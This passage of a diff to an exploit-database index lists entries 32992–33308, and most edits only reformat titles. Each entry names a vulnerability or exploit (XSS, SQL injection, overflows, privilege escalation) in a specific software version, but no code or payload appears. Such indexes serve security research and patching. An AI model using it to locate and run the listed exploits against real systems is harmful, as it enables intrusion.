Sandor Attila",php,webapps,0 32992,platforms/php/webapps/32992.txt,"MagpieRSS 0.72 Cross Site Scripting And HTML Injection Vulnerabilities",2009-05-08,"Justin Klein Keane",php,webapps,0 -32993,platforms/php/webapps/32993.txt,"Dacio's Image Gallery 1.6 Multiple Remote Vulnerabilities",2009-05-11,ahmadbady,php,webapps,0 +32993,platforms/php/webapps/32993.txt,"Dacio's Image Gallery 1.6 - Multiple Remote Vulnerabilities",2009-05-11,ahmadbady,php,webapps,0 32994,platforms/multiple/remote/32994.xml,"Apple Safari <= 3.2.2 'feed:' URI Multiple Input Validation Vulnerabilities",2009-05-12,"Billy Rios",multiple,remote,0 -32995,platforms/linux/dos/32995.txt,"Sendmail 8.12.x 'X-header' Remote Heap Buffer Overflow Vulnerability",2009-05-27,"Simple Nomad",linux,dos,0 +32995,platforms/linux/dos/32995.txt,"Sendmail 8.12.x - 'X-header' Remote Heap Buffer Overflow Vulnerability",2009-05-27,"Simple Nomad",linux,dos,0 32996,platforms/multiple/remote/32996.txt,"Nortel Contact Center Manager Administration Password Disclosure Vulnerability",2009-05-14,"Bernhard Muller",multiple,remote,0 32997,platforms/windows/remote/32997.pl,"Acunetix 8 build 20120704 - Remote Stack Based Overflow",2014-04-24,An7i,windows,remote,0 32998,platforms/multiple/remote/32998.c,"Heartbleed OpenSSL - Information Leak Exploit (2) - DTLS Support",2014-04-24,"Ayman Sagy",multiple,remote,0 @@ -29731,7 +29731,7 @@ id,file,description,date,author,platform,type,port 33011,platforms/php/webapps/33011.txt,"PHP-Nuke 8.0 'main/tracking/userLog.php' SQL Injection Vulnerability",2009-05-27,"Gerendi Sandor Attila",php,webapps,0 33012,platforms/windows/local/33012.c,"Microsoft Windows XP/2000/2003 Desktop Wall Paper System Parameter Local Privilege Escalation Vulnerability",2009-02-02,Arkon,windows,local,0 33013,platforms/php/webapps/33013.txt,"Lussumo Vanilla 1.1.5/1.1.7 'updatecheck.php' Cross Site Scripting Vulnerability",2009-05-15,"Gerendi Sandor Attila",php,webapps,0 -33014,platforms/php/webapps/33014.txt,"Achievo <= 1.3.4 Multiple Cross Site Scripting Vulnerabilities",2009-05-28,MaXe,php,webapps,0 +33014,platforms/php/webapps/33014.txt,"Achievo <= 1.3.4 - Multiple Cross Site Scripting Vulnerabilities",2009-05-28,MaXe,php,webapps,0 33015,platforms/linux/dos/33015.c,"Linux Kernel 2.6.x - 'splice(2)' Double Lock Local Denial of Service Vulnerability",2009-05-29,"Miklos Szeredi",linux,dos,0 33016,platforms/hardware/remote/33016.txt,"SonicWALL SSL-VPN 'cgi-bin/welcome/VirtualOffice' Remote Format String Vulnerability",2009-05-29,"Patrick Webster",hardware,remote,0 33017,platforms/linux/dos/33017.txt,"Adobe Acrobat <= 9.1.3 - Stack Exhaustion Denial of Service Vulnerability",2009-05-29,"Saint Patrick",linux,dos,0 @@ -29739,7 +29739,7 @@ id,file,description,date,author,platform,type,port 33019,platforms/multiple/webapps/33019.txt,"miSecureMessages 4.0.1 - Session Management & Authentication Bypass Vulnerabilities",2014-04-25,"Jared Bird",multiple,webapps,0 33020,platforms/linux/dos/33020.py,"CUPS <= 1.3.9 'cups/ipp.c' NULL Pointer Dereference Denial Of Service Vulnerability",2009-06-02,"Anibal Sacco",linux,dos,0 33021,platforms/php/webapps/33021.txt,"PHP-Nuke 8.0 Downloads Module 'query' Parameter Cross Site Scripting Vulnerability",2009-06-02,"Schap Security",php,webapps,0 -33022,platforms/php/webapps/33022.txt,"Joomla! Prior to 1.5.11 Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2009-06-03,"Airton Torres",php,webapps,0 +33022,platforms/php/webapps/33022.txt,"Joomla! < 1.5.11 - Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2009-06-03,"Airton Torres",php,webapps,0 33023,platforms/multiple/remote/33023.txt,"Apache Tomcat <= 6.0.18 Form Authentication Existing/Non-Existing Username Enumeration Weakness",2009-06-03,"D. Matscheko",multiple,remote,0 33024,platforms/windows/remote/33024.txt,"Microsoft Internet Explorer 5.0.1 - Cached Content Cross Domain Information Disclosure Vulnerability",2009-06-09,"Jorge Luis Alvarez Medina",windows,remote,0 33025,platforms/windows/remote/33025.txt,"LogMeIn 4.0.784 'cfgadvanced.html' HTTP Header Injection Vulnerability",2009-06-05,Inferno,windows,remote,0 @@ -29754,7 +29754,7 @@ id,file,description,date,author,platform,type,port 33035,platforms/windows/remote/33035.txt,"Microsoft Windows Media Player 11 ScriptCommand Multiple Information Disclosure Vulnerabilities",2009-05-12,"Rosario Valotta",windows,remote,0 33036,platforms/linux/dos/33036.txt,"Git <= 1.6.3 Parameter Processing Remote Denial Of Service Vulnerability",2009-05-05,"Shawn O. Pearce",linux,dos,0 33037,platforms/multiple/dos/33037.html,"Apple QuickTime <= 7.4.1 NULL Pointer Dereference Denial of Service Vulnerability",2009-05-14,"Thierry Zoller",multiple,dos,0 -33038,platforms/php/webapps/33038.txt,"Webmedia Explorer 5.0.9/5.10 Multiple Cross Site Scripting Vulnerabilities",2009-05-15,intern0t,php,webapps,0 +33038,platforms/php/webapps/33038.txt,"Webmedia Explorer 5.0.9/5.10 - Multiple Cross Site Scripting Vulnerabilities",2009-05-15,intern0t,php,webapps,0 33039,platforms/linux/remote/33039.txt,"Mozilla Firefox <= 3.0.10 and SeaMonkey <= 1.1.16 Address Bar URI Spoofing Vulnerability",2009-05-11,"Pavel Cvrcek",linux,remote,0 33040,platforms/linux/dos/33040.txt,"GUPnP 0.12.7 Message Handling Denial Of Service Vulnerability",2009-05-03,"Zeeshan Ali",linux,dos,0 33041,platforms/linux/dos/33041.txt,"Irssi <= 0.8.13 'WALLOPS' Message Off By One Heap Memory Corruption Vulnerability",2009-05-15,nemo,linux,dos,0 @@ -29772,12 +29772,12 @@ id,file,description,date,author,platform,type,port 33053,platforms/linux/remote/33053.txt,"Samba <= 3.3.5 Format String And Security Bypass Vulnerabilities",2009-05-19,"Jeremy Allison",linux,remote,0 33054,platforms/hardware/remote/33054.txt,"Cisco Adaptive Security Appliance 8.x Web VPN FTP or CIFS Authentication Form Phishing Vulnerability",2009-05-24,"David Byrne",hardware,remote,0 33055,platforms/hardware/remote/33055.html,"Cisco ASA Appliance 8.x WebVPN DOM Wrapper Cross Site Scripting Vulnerability",2009-05-24,"Trustwave's SpiderLabs",hardware,remote,0 -33056,platforms/windows/dos/33056.pl,"Symantec Endpoint Protection Manager 12.1.x - SEH Overflow POC",2014-04-27,st3n,windows,dos,0 +33056,platforms/windows/dos/33056.pl,"Symantec Endpoint Protection Manager 12.1.x - SEH Overflow PoC",2014-04-27,st3n,windows,dos,0 33057,platforms/php/webapps/33057.txt,"Aardvark Topsites PHP 5.2 'index.php' Cross Site Scripting Vulnerability",2009-05-26,anonymous,php,webapps,0 33058,platforms/multiple/dos/33058.txt,"Multiple BSD Distributions 'gdtoa/misc.c' Memory Corruption Vulnerability",2009-05-26,"Maksymilian Arciemowicz",multiple,dos,0 33059,platforms/windows/dos/33059.smpl,"BaoFeng Storm 3.9.62 Playlist File Buffer Overflow Vulnerability",2009-05-28,Jambalaya,windows,dos,0 33060,platforms/php/webapps/33060.txt,"phpMyAdmin <= 3.3.0 'db' Parameter Cross Site Scripting Vulnerability",2009-05-30,r0t,php,webapps,0 -33061,platforms/php/webapps/33061.php,"Joomla! 1.5.x Cross Site Scripting and Information Disclosure Vulnerabilities",2009-06-01,"Juan Galiana Lara",php,webapps,0 +33061,platforms/php/webapps/33061.php,"Joomla! 1.5.x - Cross Site Scripting and Information Disclosure Vulnerabilities",2009-06-01,"Juan Galiana Lara",php,webapps,0 33062,platforms/windows/dos/33062.txt,"Apple Safari 4 'reload()' Denial of Service Vulnerability",2009-06-02,SkyOut,windows,dos,0 33063,platforms/windows/remote/33063.txt,"Microsoft Internet Explorer 6.0 'javascript:' URI in 'Refresh' Header Cross-Site Scripting Vulnerability",2009-06-03,MustLive,windows,remote,0 33064,platforms/multiple/remote/33064.txt,"Google Chrome <= 0.3.154 'javascript:' URI in 'Refresh' Header Cross-Site Scripting Vulnerability",2009-06-03,MustLive,multiple,remote,0 @@ -29816,13 +29816,13 @@ id,file,description,date,author,platform,type,port 33101,platforms/linux/dos/33101.txt,"Mozilla Firefox <= 3.0.11 and Thunderbird <= 2.0.9 - RDF File Handling Remote Memory Corruption Vulnerability",2009-06-21,"Christophe Charron",linux,dos,0 33102,platforms/php/webapps/33102.txt,"CommuniGate Pro 5.2.14 Web Mail URI Parsing HTML Injection Vulnerability",2009-06-23,"Andrea Purificato",php,webapps,0 33103,platforms/linux/remote/33103.html,"Mozilla Firefox <= 3.5.1 Error Page Address Bar URI Spoofing Vulnerability",2009-06-24,"Juan Pablo Lopez Yacubian",linux,remote,0 -33104,platforms/multiple/dos/33104.txt,"Star Wars Battlefront II 1.1 Remote Denial of Service Vulnerability",2009-06-24,"Luigi Auriemma",multiple,dos,0 +33104,platforms/multiple/dos/33104.txt,"Star Wars Battlefront II 1.1 - Remote Denial of Service Vulnerability",2009-06-24,"Luigi Auriemma",multiple,dos,0 33105,platforms/multiple/dos/33105.txt,"TrackMania 2.11.11 - Multiple Remote Vulnerabilities",2009-06-27,"Luigi Auriemma",multiple,dos,0 33106,platforms/php/webapps/33106.txt,"PG MatchMaking browse_ladies.php show Parameter XSS",2009-06-24,Moudi,php,webapps,0 33107,platforms/php/webapps/33107.txt,"PG MatchMaking browse_men.php show Parameter XSS",2009-06-24,Moudi,php,webapps,0 33108,platforms/php/webapps/33108.txt,"PG MatchMaking search.php show Parameter XSS",2009-06-24,Moudi,php,webapps,0 33109,platforms/php/webapps/33109.txt,"PG MatchMaking services.php show Parameter XSS",2009-06-24,Moudi,php,webapps,0 -33110,platforms/php/webapps/33110.txt,"XZeroScripts XZero Community Classifieds 4.97.8 Multiple Cross Site Scripting Vulnerabilities",2009-06-24,Moudi,php,webapps,0 +33110,platforms/php/webapps/33110.txt,"XZeroScripts XZero Community Classifieds 4.97.8 - Multiple Cross Site Scripting Vulnerabilities",2009-06-24,Moudi,php,webapps,0 33111,platforms/php/webapps/33111.txt,"AIOCP 1.4 'cp_html2txt.php' Remote File Include Vulnerability",2009-06-27,"Hadi Kiamarsi",php,webapps,0 33112,platforms/php/webapps/33112.txt,"PG Roommate Finder Solution quick_search.php part Parameter XSS",2009-06-27,Moudi,php,webapps,0 33113,platforms/php/webapps/33113.txt,"PG Roommate Finder Solution viewprofile.php part Parameter XSS",2009-06-27,Moudi,php,webapps,0 @@ -29835,10 +29835,10 @@ id,file,description,date,author,platform,type,port 33120,platforms/php/webapps/33120.txt,"Pilot Group eTraining news_read.php id Parameter XSS",2009-06-24,Moudi,php,webapps,0 33121,platforms/php/webapps/33121.txt,"Pilot Group eTraining lessons_login.php Multiple Parameter XSS",2009-06-24,Moudi,php,webapps,0 33122,platforms/php/webapps/33122.txt,"Joomla! 'com_user' Component 'view' Parameter URI Redirection Vulnerability",2009-06-27,"599eme Man",php,webapps,0 -33123,platforms/multiple/remote/33123.html,"Google Chrome Google Chrome 2.0.172 'About:blank' Address Bar URI Spoofing Vulnerability'About:blank' Address Bar URI Spoofing Vulnerability",2009-06-28,Lostmon,multiple,remote,0 +33123,platforms/multiple/remote/33123.html,"Google Chrome 2.0.172 - 'About:blank' Address Bar URI Spoofing Vulnerability'About:blank' Address Bar URI Spoofing Vulnerability",2009-06-28,Lostmon,multiple,remote,0 33124,platforms/multiple/remote/33124.txt,"Google Chrome 2.0.172 'chrome://history/' URI Cross-Site Scripting Vulnerability",2009-06-28,"Karn Ganeshen",multiple,remote,0 33125,platforms/php/webapps/33125.txt,"Joomla! Permis 1.0 ('com_groups') Component 'id' Parameter SQL Injection Vulnerability",2009-06-28,Prince_Pwn3r,php,webapps,0 -33126,platforms/php/webapps/33126.txt,"Matterdaddy Market 1.x 'index.php' Cross Site Scripting Vulnerability",2009-06-28,Moudi,php,webapps,0 +33126,platforms/php/webapps/33126.txt,"Matterdaddy Market 1.x - 'index.php' Cross Site Scripting Vulnerability",2009-06-28,Moudi,php,webapps,0 33127,platforms/php/webapps/33127.txt,"Miniweb 2.0 Site Builder Module Multiple Cross Site Scripting Vulnerabilities",2009-06-29,Moudi,php,webapps,0 33128,platforms/linux/remote/33128.txt,"Mozilla NSS NULL Character CA SSL Certificate Validation Security Bypass Vulnerability",2009-06-30,"Dan Kaminsky",linux,remote,0 33129,platforms/hardware/webapps/33129.html,"Beetel 450TC2 Router Admin Password CSRF Vulnerability",2014-04-30,"shyamkumar somana",hardware,webapps,80 @@ -29852,12 +29852,12 @@ id,file,description,date,author,platform,type,port 33141,platforms/php/remote/33141.rb,"AlienVault OSSIM SQL Injection and Remote Code Execution",2014-05-02,metasploit,php,remote,443 33142,platforms/multiple/remote/33142.rb,"Apache Struts ClassLoader Manipulation Remote Code Execution",2014-05-02,metasploit,multiple,remote,8080 33143,platforms/hardware/remote/33143.rb,"F5 BIG-IQ 4.1.0.2013.0 - Privilege Escalation",2014-05-02,"Brandon Perry",hardware,remote,443 -33144,platforms/php/webapps/33144.txt,"Censura Prior to 2.1.1 Multiple Cross Site Scripting Vulnerabilities",2009-06-29,mark99,php,webapps,0 +33144,platforms/php/webapps/33144.txt,"Censura < 2.1.1 - Multiple Cross Site Scripting Vulnerabilities",2009-06-29,mark99,php,webapps,0 33145,platforms/linux/local/33145.c,"PHP Fuzzer Framework Default Location Insecure Temporary File Creation Vulnerability",2009-08-03,"Melissa Elliott",linux,local,0 33146,platforms/php/webapps/33146.txt,"CS-Cart 2.0.5 'reward_points.post.php' SQL Injection Vulnerability",2009-08-04,"Ryan Dewhurst",php,webapps,0 33147,platforms/php/webapps/33147.txt,"AJ Auction Pro 3.0 - 'txtkeyword' Parameter Cross Site Scripting Vulnerability",2009-08-05,"599eme Man",php,webapps,0 -33148,platforms/linux/dos/33148.c,"Linux Kernel 2.6.x 'posix-timers.c' NULL Pointer Dereference Denial of Service Vulnerability",2009-08-06,"Hiroshi Shimamoto",linux,dos,0 -33149,platforms/php/webapps/33149.txt,"Alkacon OpenCms 7.x Multiple Input Validation Vulnerabilities",2009-08-06,"Katie French",php,webapps,0 +33148,platforms/linux/dos/33148.c,"Linux Kernel 2.6.x - 'posix-timers.c' NULL Pointer Dereference Denial of Service Vulnerability",2009-08-06,"Hiroshi Shimamoto",linux,dos,0 +33149,platforms/php/webapps/33149.txt,"Alkacon OpenCMS 7.x - Multiple Input Validation Vulnerabilities",2009-08-06,"Katie French",php,webapps,0 33152,platforms/php/webapps/33152.txt,"PhotoPost PHP 3.3.1 'cat' Parameter Cross Site Scripting and SQL Injection Vulnerabilities",2009-08-07,"599eme Man",php,webapps,0 33153,platforms/php/webapps/33153.txt,"SupportPRO SupportDesk 3.0 'shownews.php' Cross Site Scripting Vulnerability",2009-08-10,Moudi,php,webapps,0 33154,platforms/php/webapps/33154.txt,"SQLiteManager 1.2 'main.php' Cross Site Scripting Vulnerability",2009-08-10,"Hadi Kiamarsi",php,webapps,0 @@ -29883,9 +29883,9 @@ id,file,description,date,author,platform,type,port 33174,platforms/windows/dos/33174.html,"Microsoft Internet Explorer 6/7/8 'li' Element Denial of Service Vulnerability (2)",2007-02-07,trevordixon,windows,dos,0 33175,platforms/windows/dos/33175.txt,"Microsoft Internet Explorer 6/7/8 'li' Element Denial of Service Vulnerability (3)",2007-02-07,trevordixon,windows,dos,0 33176,platforms/linux/dos/33176.rb,"ntop 3.3.10 HTTP Basic Authentication NULL Pointer Dereference Denial Of Service Vulnerability",2009-08-18,"Brad Antoniewicz",linux,dos,0 -33177,platforms/hardware/remote/33177.txt,"NetGear WNR2000 Multiple Information Disclosure Vulnerabilities",2009-08-18,"Jean Trolleur",hardware,remote,0 +33177,platforms/hardware/remote/33177.txt,"NetGear WNR2000 - Multiple Information Disclosure Vulnerabilities",2009-08-18,"Jean Trolleur",hardware,remote,0 33178,platforms/php/webapps/33178.txt,"Computer Associates SiteMinder '%00' Cross Site Scripting Protection Security Bypass Vulnerability",2009-06-08,"Arshan Dabirsiaghi",php,webapps,0 -33180,platforms/multiple/webapps/33180.txt,"Adobe Flex SDK 3.x 'index.template.html' Cross Site Scripting Vulnerability",2009-08-19,"Adam Bixby",multiple,webapps,0 +33180,platforms/multiple/webapps/33180.txt,"Adobe Flex SDK 3.x - 'index.template.html' Cross Site Scripting Vulnerability",2009-08-19,"Adam Bixby",multiple,webapps,0 33181,platforms/java/webapps/33181.txt,"Computer Associates SiteMinder Unicode Cross Site Scripting Protection Security Bypass Vulnerability",2009-06-08,"Arshan Dabirsiaghi",java,webapps,0 33182,platforms/multiple/dos/33182.txt,"Live For Speed S2 - Duplicate Join Packet Remote Denial of Service Vulnerability",2009-08-23,"Luigi Auriemma",multiple,dos,0 33183,platforms/novell/dos/33183.html,"Novell Client 4.91.5 ActiveX Control 'nwsetup.dll' Unspecified Remote Denial of Service Vulnerability (1)",2009-08-25,"Francis Provencher",novell,dos,0 @@ -29894,12 +29894,12 @@ id,file,description,date,author,platform,type,port 33186,platforms/php/webapps/33186.txt,"VideoGirls forum.php t Parameter XSS",2009-08-26,Moudi,php,webapps,0 33187,platforms/php/webapps/33187.txt,"VideoGirls profile.php profile_name Parameter XSS",2009-08-26,Moudi,php,webapps,0 33188,platforms/php/webapps/33188.txt,"VideoGirls view.php p Parameter XSS",2009-08-26,Moudi,php,webapps,0 -33189,platforms/php/webapps/33189.txt,"PHP-Fusion 6.1.18 Multiple Information Disclosure Vulnerabilities",2009-08-26,Inj3ct0r,php,webapps,0 +33189,platforms/php/webapps/33189.txt,"PHP-Fusion 6.1.18 - Multiple Information Disclosure Vulnerabilities",2009-08-26,Inj3ct0r,php,webapps,0 33190,platforms/php/webapps/33190.txt,"OpenAutoClassifieds <= 1.5.9 SQL Injection Vulnerabilities",2009-08-25,"Andrew Horton",php,webapps,0 33191,platforms/php/webapps/33191.txt,"FlexCMS 2.5 'CookieUsername' Cookie Parameter SQL Injection Vulnerability",2009-08-28,Inj3ct0r,php,webapps,0 33192,platforms/multiple/remote/33192.php,"Google Chrome <= 6.0.472 'Math.Random()' Random Number Generation Vulnerability",2009-08-31,"Amit Klein",multiple,remote,0 -33193,platforms/linux/dos/33193.c,"Linux Kernel 2.6.x 'drivers/char/tty_ldisc.c' NULL Pointer Dereference Denial of Service Vulnerability",2009-08-19,"Eric W. Biederman",linux,dos,0 -33195,platforms/php/webapps/33195.txt,"TeamHelpdesk Customer Web Service (CWS) 8.3.5 & Technician Web Access (TWA) 8.3.5 - Remote User Credential Dump",2014-05-05,bhamb,php,webapps,0 +33193,platforms/linux/dos/33193.c,"Linux Kernel 2.6.x - 'drivers/char/tty_ldisc.c' NULL Pointer Dereference Denial of Service Vulnerability",2009-08-19,"Eric W. Biederman",linux,dos,0 +33195,platforms/php/webapps/33195.txt,"TeamHelpdesk Customer Web Service (CWS) 8.3.5 & Technician Web Access (TWA) 8.3.5 - Remote User Credential Dump",2014-05-05,bhamb,php,webapps,0 33197,platforms/php/webapps/33197.txt,"68 Classifieds 4.1 category.php cat Parameter XSS",2009-07-27,Moudi,php,webapps,0 33198,platforms/php/webapps/33198.txt,"68 Classifieds 4.1 login.php goto Parameter XSS",2009-07-27,Moudi,php,webapps,0 33199,platforms/php/webapps/33199.txt,"68 Classifieds 4.1 searchresults.php page Parameter XSS",2009-07-27,Moudi,php,webapps,0 @@ -29908,10 +29908,10 @@ id,file,description,date,author,platform,type,port 33202,platforms/php/webapps/33202.txt,"68 Classifieds 4.1 viewmember.php member Parameter XSS",2009-07-27,Moudi,php,webapps,0 33203,platforms/multiple/remote/33203.txt,"GreenSQL Firewall 0.9.x WHERE Clause Secuity Bypass Vulnerability",2009-09-02,"Johannes Dahse",multiple,remote,0 33204,platforms/php/webapps/33204.txt,"phpAuction 3.2 'lan' Parameter Remote File Include Vulnerability",2009-09-09,"Beenu Arora",php,webapps,0 -33205,platforms/windows/dos/33205.pl,"Nokia Multimedia Player 1.1 Remote Denial of Service Vulnerability",2009-09-01,"opt!x hacker",windows,dos,0 -33206,platforms/php/webapps/33206.txt,"MKPortal 1.x Multiple Modules Cross Site Scripting Vulnerabilities",2009-08-31,Inj3ct0r,php,webapps,0 +33205,platforms/windows/dos/33205.pl,"Nokia Multimedia Player 1.1 - Remote Denial of Service Vulnerability",2009-09-01,"opt!x hacker",windows,dos,0 +33206,platforms/php/webapps/33206.txt,"MKPortal 1.x - Multiple Modules Cross Site Scripting Vulnerabilities",2009-08-31,Inj3ct0r,php,webapps,0 33207,platforms/windows/remote/33207.txt,"SmartVMD 1.3 ActiveX Control 'VideoMovementDetection.dll' Buffer Overflow Vulnerability",2009-09-01,"optix hacker",windows,remote,0 -33208,platforms/php/webapps/33208.txt,"MKPortal 1.x Multiple BBCode HTML Injection Vulnerabilities",2009-08-31,Inj3ct0r,php,webapps,0 +33208,platforms/php/webapps/33208.txt,"MKPortal 1.x - Multiple BBCode HTML Injection Vulnerabilities",2009-08-31,Inj3ct0r,php,webapps,0 33209,platforms/jsp/webapps/33209.txt,"Adobe RoboHelp Server 8 Authentication Bypass Vulnerability",2009-09-03,Intevydis,jsp,webapps,0 33210,platforms/multiple/remote/33210.txt,"HP Operations Manager Default Manager 8.1 Account Remote Security Vulnerability",2009-09-03,Intevydis,multiple,remote,0 33211,platforms/multiple/remote/33211.txt,"HP Operations Dashboard 2.1 Portal Default Manager Account Remote Security Vulnerability",2009-09-03,Intevydis,multiple,remote,0 @@ -29933,10 +29933,10 @@ id,file,description,date,author,platform,type,port 33227,platforms/php/webapps/33227.txt,"TuttoPHP Morris Guestbook 'view.php' Cross Site Scripting Vulnerability",2009-09-16,Moudi,php,webapps,0 33228,platforms/linux/local/33228.txt,"Linux Kernel 2.6.31 - 'perf_counter_open()' Local Buffer Overflow Vulnerability",2009-09-16,"Xiao Guangrong",linux,local,0 33229,platforms/bsd/local/33229.c,"NetBSD <= 5.0.1 'IRET' General Protection Fault Handling Local Privilege Escalation Vulnerability",2009-09-16,"Tavis Ormandy",bsd,local,0 -33230,platforms/linux/dos/33230.txt,"GNU glibc 2.x 'strfmon()' Function Integer Overflow Weakness",2009-09-17,"Maksymilian Arciemowicz",linux,dos,0 -33231,platforms/cgi/webapps/33231.txt,"Avaya Intuity Audix LX R1.1 Multiple Remote Vulnerabilities",2009-09-18,pagvac,cgi,webapps,0 +33230,platforms/linux/dos/33230.txt,"GNU glibc 2.x - 'strfmon()' Function Integer Overflow Weakness",2009-09-17,"Maksymilian Arciemowicz",linux,dos,0 +33231,platforms/cgi/webapps/33231.txt,"Avaya Intuity Audix LX R1.1 - Multiple Remote Vulnerabilities",2009-09-18,pagvac,cgi,webapps,0 33232,platforms/php/webapps/33232.txt,"MyBB 1.4.8 'search.php' SQL Injection Vulnerability",2009-09-19,$qL_DoCt0r,php,webapps,0 -33233,platforms/linux/dos/33233.txt,"FFmpeg Version 0.5 - Multiple Remote Vulnerabilities",2009-09-21,"Will Dormann",linux,dos,0 +33233,platforms/linux/dos/33233.txt,"FFmpeg 0.5 - Multiple Remote Vulnerabilities",2009-09-21,"Will Dormann",linux,dos,0 33234,platforms/hardware/remote/33234.txt,"Check Point Connectra R62 '/Login/Login' Arbitrary Script Injection Vulnerability",2009-09-21,"Stefan Friedli",hardware,remote,0 33235,platforms/osx/dos/33235.rb,"Apple iTunes <= 9.0 '.pls' File Buffer Overflow Vulnerability",2009-09-22,"Roger Hart",osx,dos,0 33236,platforms/asp/webapps/33236.txt,"MaxWebPortal 1.365 'forum.asp' SQL Injection Vulnerability",2009-09-22,OoN_Boy,asp,webapps,0 @@ -29954,8 +29954,8 @@ id,file,description,date,author,platform,type,port 33252,platforms/php/webapps/33252.txt,"Cobbler 2.4.x - 2.6.x - LFI Vulnerability",2014-05-08,"Dolev Farhi",php,webapps,0 33254,platforms/java/webapps/33254.txt,"IBM Lotus Connections 2.0.1 'simpleSearch.do' Cross Site Scripting Vulnerability",2009-09-23,IBM,java,webapps,0 33255,platforms/linux/local/33255.txt,"Xen 3.x pygrub Local Authentication Bypass Vulnerability",2009-09-25,"Jan Lieskovsky",linux,local,0 -33256,platforms/php/webapps/33256.txt,"e107 0.7.x 'CAPTCHA' Security Bypass Vulnerability and Multiple Cross Site Scripting Vulnerabilities",2009-09-28,MustLive,php,webapps,0 -33257,platforms/hardware/remote/33257.txt,"Juniper Junos 8.5/9.0 J-Web Interface Default URI PATH_INFO Parameter XSS",2009-09-22,"Amir Azam",hardware,remote,0 +33256,platforms/php/webapps/33256.txt,"e107 0.7.x - 'CAPTCHA' Security Bypass Vulnerability and Multiple Cross Site Scripting Vulnerabilities",2009-09-28,MustLive,php,webapps,0 +33257,platforms/hardware/remote/33257.txt,"Juniper Junos 8.5/9.0 J - Web Interface Default URI PATH_INFO Parameter XSS",2009-09-22,"Amir Azam",hardware,remote,0 33258,platforms/hardware/remote/33258.txt,"Juniper Junos 8.5/9.0 J-Web Interface /diagnose Multiple Parameter XSS",2009-09-22,"Amir Azam",hardware,remote,0 33259,platforms/hardware/remote/33259.txt,"Juniper Junos 8.5/9.0 J-Web Interface /configuration Multiple Parameter XSS",2009-09-22,"Amir Azam",hardware,remote,0 33260,platforms/hardware/remote/33260.txt,"Juniper Junos 8.5/9.0 J-Web Interface /scripter.php Multiple Parameter XSS",2009-09-22,"Amir Azam",hardware,remote,0 @@ -29966,17 +29966,17 @@ id,file,description,date,author,platform,type,port 33265,platforms/hardware/remote/33265.js,"Palm WebOS 1.0/1.1 Email Arbitrary Script Injection Vulnerability",2009-10-05,"Townsend Ladd Harris",hardware,remote,0 33266,platforms/php/webapps/33266.txt,"Joomla! CB Resume Builder 'group_id' Parameter SQL Injection Vulnerability",2009-10-05,kaMtiEz,php,webapps,0 33267,platforms/php/webapps/33267.txt,"X-Cart Email Subscription 'email' Parameter Cross Site Scripting Vulnerability",2009-10-06,"Paulo Santos",php,webapps,0 -33268,platforms/asp/webapps/33268.html,"AfterLogic WebMail Pro 4.7.10 Multiple Cross Site Scripting Vulnerabilities",2009-10-06,"Sébastien Duquette",asp,webapps,0 +33268,platforms/asp/webapps/33268.html,"AfterLogic WebMail Pro 4.7.10 - Multiple Cross Site Scripting Vulnerabilities",2009-10-06,"Sébastien Duquette",asp,webapps,0 33269,platforms/linux/dos/33269.txt,"Dopewars Server 1.5.12 'REQUESTJET' Message Remote Denial of Service Vulnerability",2009-10-15,"Doug Prostko",linux,dos,0 33270,platforms/windows/remote/33270.txt,"Microsoft Internet Explorer 5.0.1 'deflate' HTTP Content Encoding Remote Code Execution Vulnerability",2009-10-13,Skylined,windows,remote,0 33271,platforms/windows/dos/33271.py,"VMware Player and Workstation <= 6.5.3 'vmware-authd' Remote Denial of Service Vulnerability",2009-10-07,shinnai,windows,dos,0 33272,platforms/windows/remote/33272.txt,"Autodesk 3ds Max Application Callbacks Arbitrary Command Execution Vulnerability",2009-10-23,"Sebastian Tello",windows,remote,0 33273,platforms/windows/remote/33273.scn,"Autodesk Softimage 7.0 Scene TOC File Remote Code Execution Vulnerability",2009-11-23,"Diego Juarez",windows,remote,0 33280,platforms/hardware/dos/33280.txt,"Palm WebOS 1.0/1.1 'LunaSysMgr' Service Denial of Service Vulnerability",2009-10-13,"Townsend Ladd Harris",hardware,dos,0 -33281,platforms/php/webapps/33281.txt,"Achievo 1.x Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2009-10-13,"Ryan Dewhurst",php,webapps,0 +33281,platforms/php/webapps/33281.txt,"Achievo 1.x - Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2009-10-13,"Ryan Dewhurst",php,webapps,0 33282,platforms/php/webapps/33282.txt,"Dream Poll 3.1 'index.php' Cross-Site Scripting and SQL Injection Vulnerabilities",2009-10-13,infosecstuff,php,webapps,0 33283,platforms/linux/dos/33283.txt,"Adobe Reader <= 9.1.3 and Acrobat COM Objects Memory Corruption Remote Code Execution Vulnerability",2009-10-13,Skylined,linux,dos,0 -33284,platforms/multiple/webapps/33284.txt,"Pentaho BI 1.x Multiple Cross Site Scripting and Information Disclosure Vulnerabilities",2009-10-14,euronymous,multiple,webapps,0 +33284,platforms/multiple/webapps/33284.txt,"Pentaho BI 1.x - Multiple Cross Site Scripting and Information Disclosure Vulnerabilities",2009-10-14,euronymous,multiple,webapps,0 33286,platforms/java/webapps/33286.txt,"Eclipse BIRT 2.2.1 'run?__report' Parameter Cross Site Scripting Vulnerability",2009-10-14,"Michele Orru",java,webapps,0 33287,platforms/php/webapps/33287.txt,"bloofoxCMS 0.3.5 'search' Parameter Cross Site Scripting Vulnerability",2009-10-15,"drunken danish rednecks",php,webapps,0 33288,platforms/php/webapps/33288.txt,"Zainu 1.0 'searchSongKeyword' Parameter Cross Site Scripting Vulnerability",2009-10-14,"drunken danish rednecks",php,webapps,0 @@ -29997,21 +29997,21 @@ id,file,description,date,author,platform,type,port 33303,platforms/php/webapps/33303.txt,"OpenDocMan 1.2.5 search.php XSS",2009-10-21,"Amol Naik",php,webapps,0 33304,platforms/php/webapps/33304.txt,"OpenDocMan 1.2.5 user.php XSS",2009-10-21,"Amol Naik",php,webapps,0 33305,platforms/php/webapps/33305.txt,"OpenDocMan 1.2.5 view_file.php XSS",2009-10-21,"Amol Naik",php,webapps,0 -33306,platforms/linux/dos/33306.txt,"Snort 2.8.5 Multiple Denial Of Service Vulnerabilities",2009-10-22,"laurent gaffie",linux,dos,0 +33306,platforms/linux/dos/33306.txt,"Snort 2.8.5 - Multiple Denial Of Service Vulnerabilities",2009-10-22,"laurent gaffie",linux,dos,0 33307,platforms/php/webapps/33307.php,"RunCMS 'forum' Parameter SQL Injection Vulnerability",2009-10-26,Nine:Situations:Group::bookoo,php,webapps,0 33308,platforms/php/webapps/33308.txt,"Sahana 